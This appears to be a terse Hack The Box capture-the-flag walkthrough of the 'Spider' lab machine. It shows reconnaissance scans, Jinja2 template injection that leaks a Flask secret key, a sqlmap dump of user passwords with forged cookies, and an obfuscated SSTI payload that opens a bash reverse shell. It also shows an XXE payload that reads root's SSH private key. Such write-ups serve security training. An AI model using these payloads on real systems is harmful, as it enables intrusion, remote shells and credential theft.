$ sudo nmap -p- -T4 -A 10.10.10.243
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 28:f1:61:28:01:63:29:6d:c5:03:6d:a9:f0:b0:66:61 (RSA)
| 256 3a:15:8c:cc:66:f4:9d:cb:ed:8a:1f:f9:d7:ab:d1:cc (ECDSA)
|_ 256 a6:d4:0c:8e:5b:aa:3f:93:74:d6:a8:08:c9:52:39:09 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://spider.htb/
$ echo 10.10.10.243 spider.htb | sudo tee -a /etc/hosts
$ dirb http://spider.htb
---- Scanning URL: http://spider.htb/ ----
+ http://spider.htb/cart (CODE:500|SIZE:290)
+ http://spider.htb/checkout (CODE:500|SIZE:290)
+ http://spider.htb/index (CODE:500|SIZE:290)
+ http://spider.htb/login (CODE:200|SIZE:1832)
+ http://spider.htb/logout (CODE:302|SIZE:209)
+ http://spider.htb/main (CODE:500|SIZE:290)
+ http://spider.htb/register (CODE:200|SIZE:2130)
+ http://spider.htb/user (CODE:302|SIZE:219)
+ http://spider.htb/view (CODE:302|SIZE:219)
$ nikto -h http://spider.htb
+ Server: nginx/1.14.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /static/img/core-img/favicon.ico, inode: 1587179459.0, size: 1045, mtime: 2784498078
+ Allowed HTTP Methods: HEAD, OPTIONS, POST, GET
register {{7*7}} we get 49
Jinja2 or flask
with user {{config}} we get:
<Config {'ENV': 'production', 'DEBUG': False, 'TESTING': False, 'PROPAGATE_EXCEPTIONS': None, 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SECRET_KEY': 'Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942', 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31), 'USE_X_SENDFILE': False, 'SERVER_NAME': None, 'APPLICATION_ROOT': '/', 'SESSION_COOKIE_NAME': 'session', 'SESSION_COOKIE_DOMAIN': False, 'SESSION_COOKIE_PATH': None, 'SESSION_COOKIE_HTTPONLY': True, 'SESSION_COOKIE_SECURE': False, 'SESSION_COOKIE_SAMESITE': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'MAX_CONTENT_LENGTH': None, 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(0, 43200), 'TRAP_BAD_REQUEST_ERRORS': None, 'TRAP_HTTP_EXCEPTIONS': False, 'EXPLAIN_TEMPLATE_LOADING': False, 'PREFERRED_URL_SCHEME': 'http', 'JSON_AS_ASCII': True, 'JSON_SORT_KEYS': True, 'JSONIFY_PRETTYPRINT_REGULAR': False, 'JSONIFY_MIMETYPE': 'application/json', 'TEMPLATES_AUTO_RELOAD': None, 'MAX_COOKIE_SIZE': 4093, 'RATELIMIT_ENABLED': True, 'RATELIMIT_DEFAULTS_PER_METHOD': False, 'RATELIMIT_SWALLOW_ERRORS': False, 'RATELIMIT_HEADERS_ENABLED': False, 'RATELIMIT_STORAGE_URL': 'memory://', 'RATELIMIT_STRATEGY': 'fixed-window', 'RATELIMIT_HEADER_RESET': 'X-RateLimit-Reset', 'RATELIMIT_HEADER_REMAINING': 'X-RateLimit-Remaining', 'RATELIMIT_HEADER_LIMIT': 'X-RateLimit-Limit', 'RATELIMIT_HEADER_RETRY_AFTER': 'Retry-After', 'UPLOAD_FOLDER': 'static/uploads'}>
SSTI(Server-Side Template Injection)
$ sqlmap http://spider.htb/ --eval "from flask_unsign import session as s; session = s.sign({'uuid': session}, secret='Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942')" --cookie="session=*" --delay 1 --dump
In first question of sqlmap type "Y" and after that type "n"
Database: shop
Table: users
[4 entries]
+----+--------------------------------------+------------+-----------------+
| id | uuid | name | password |
+----+--------------------------------------+------------+-----------------+
| 1 | 129f60ea-30cf-4065-afb9-6be45ad38b73 | chiv | ch1VW4sHERE7331 |
| 2 | 1bf26b09-81c8-4888-9c13-8abbdc851735 | cpt | Cyber!23 |
| 3 | b8ba2786-c628-4274-b296-3b1341113881 | {{7*7}} | 123 |
| 4 | 13c7e709-0099-4718-9fd0-ad9f238b7886 | {{config}} | 123 |
+----+--------------------------------------+------------+-----------------+
login chiv / ch1VW4sHERE7331
Server Side Template Injection Payloads
http://spider.htb/a1836bb97e5f4ce6b3e8f25693c1a16c.unfinished.supportportal
$ nc -lvnp 4444
$ echo 'bash -i >&/dev/tcp/10.10.14.42/4444 0>&1' | base64
YmFzaCAtaSAgPiYvZGV2L3RjcC8xMC4xMC4xNC40Mi80NDQ0IDA+JjEK
kali@kali:~/0.htb/machines/Spider243$
submit a support ticket in both Contact number or email and message:
{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSAgPiYvZGV2L3RjcC8xMC4xMC4xNC40Mi80NDQ0IDA+JjEK | base64 -d | bash")["read"]() %} a {% endwith %}
$ nc -lvnp 4444
kali@kali:~/0.htb/machines/Spider243$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.42] from (UNKNOWN) [10.10.10.243] 43100
bash: cannot set terminal process group (1405): Inappropriate ioctl for device
bash: no job control in this shell
chiv@spider:/var/www/webapp$
chiv@spider:~$ ccaatt uusseerr..ttxxtt
95cc06074261936b2593904ebdca9ae4
chiv@spider:~$
chiv@spider:~/.ssh$ ccaatt iidd__rrssaa
save id_rsa to id_chiv
-rw-r--r-- 1 kali kali 1678 Jun 19 08:02 id_chiv
kali@kali:~/0.htb/machines/Spider243$ chmod 600 id_chiv
kali@kali:~/0.htb/machines/Spider243$
kali@kali:~/0.htb/machines/Spider243$ ssh -i id_chiv chiv@spider.htb
The authenticity of host 'spider.htb (10.10.10.243)' can't be established.
ECDSA key fingerprint is SHA256:Z0c/GTs+BeZXyXf2c/kRC1Y+omqtI1wPaEfrz0vvYCM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'spider.htb,10.10.10.243' (ECDSA) to the list of known hosts.
Last login: Sat Jun 19 02:45:30 2021 from 10.10.14.200
chiv@spider:~$
chiv@spider:~$ ss -lntup
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 100 127.0.0.1:8080 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
chiv@spider:~$
For access the port 8080 we need to forward the port.
kali@kali:~/0.htb/machines/Spider243$ ssh -i id_chiv -L 9090:localhost:8080 chiv@spider.htb
Last login: Sat Jun 19 12:18:20 2021 from 10.10.14.42
chiv@spider:~$
http://127.0.0.1:9090/login
http://127.0.0.1:9090/site
session cookie
.eJw1jE1PwyAAhv-K4eyB1u3SZJcOaO2ECuWj42aDCa3Q1clhbtl_d9N4fPM8z3sB4RQDKC7gYQAFUJgRh0-SfzRamDTrmJl3Q7-H2o5viqxktZROZYj3gmokXhT2Oxefz6pL6MbnTrGyJUstptLe-X1bGBA3ruEQryzx7VCxxIwfdaaORrItJSVqJZlosOt9zCpHFsVwuvl_f7-99N7gdTTada4iPdsmJmqX77VvbQi9moXXZ37kefj3KQ3NwWJHdpB9uic7DTLkFnP4yjcbcH0Ey2Gc0xco4PUHZSxU-g.YM3tag.9znDEGz_FSEgnHvDoV_osG0GGsE
flask-unsign --decode --cookie
kali@kali:~/0.htb/machines/Spider243$ flask-unsign --decode --cookie .eJw1jE1PwyAAhv-K4eyB1u3SZJcOaO2ECuWj42aDCa3Q1clhbtl_d9N4fPM8z3sB4RQDKC7gYQAFUJgRh0-SfzRamDTrmJl3Q7-H2o5viqxktZROZYj3gmokXhT2Oxefz6pL6MbnTrGyJUstptLe-X1bGBA3ruEQryzx7VCxxIwfdaaORrItJSVqJZlosOt9zCpHFsVwuvl_f7-99N7gdTTada4iPdsmJmqX77VvbQi9moXXZ37kefj3KQ3NwWJHdpB9uic7DTLkFnP4yjcbcH0Ey2Gc0xco4PUHZSxU-g.YM3tag.9znDEGz_FSEgnHvDoV_osG0GGsE
{'lxml': b'PCEtLSBBUEkgVmVyc2lvbiAxLjAuMCAtLT4KPHJvb3Q+CiAgICA8ZGF0YT4KICAgICAgICA8dXNlcm5hbWU+Y3B0PC91c2VybmFtZT4KICAgICAgICA8aXNfYWRtaW4+MDwvaXNfYWRtaW4+CiAgICA8L2RhdGE+Cjwvcm9vdD4=', 'points': 0}
kali@kali:~/0.htb/machines/Spider243$
kali@kali:~/0.htb/machines/Spider243$ echo -n PCEtLSBBUEkgVmVyc2lvbiAxLjAuMCAtLT4KPHJvb3Q+CiAgICA8ZGF0YT4KICAgICAgICA8dXNlcm5hbWU+Y3B0PC91c2VybmFtZT4KICAgICAgICA8aXNfYWRtaW4+MDwvaXNfYWRtaW4+CiAgICA8L2Rh | base64 -d
<!-- API Version 1.0.0 -->
<root>
<data>
<username>cpt</username>
<is_admin>0</is_admin>
</dakali@kali:~/0.htb/machines/Spider243$
kali@kali:~/0.htb/machines/Spider243$
XXE(XML External Entity Injection)
XXE Cheatsheet – XML External Entity Injection
burpsuite
username=%26username%3b&version=1.0.0--><!DOCTYPE+foo+[<!ENTITY+username+SYSTEM+"/root/.ssh/id_rsa">+]><!--
we get root id_rsa, save as id_root
kali@kali:~/0.htb/machines/Spider243$ chmod 600 id_root
kali@kali:~/0.htb/machines/Spider243$ ll
total 28
-rw------- 1 kali kali 1678 Jun 19 08:02 id_chiv
-rw------- 1 kali kali 1674 Jun 19 08:27 id_root
kali@kali:~/0.htb/machines/Spider243$ ssh -i id_root root@spider.htb
Last login: Sat Jun 19 04:00:57 2021 from 10.10.14.200
root@spider:~#
root@spider:~# ls -l
total 4
-r-------- 1 root root 33 Jun 19 00:55 root.txt
root@spider:~# cat root.txt
e4da9db40f53a4e53a14e61add99940c
root@spider:~#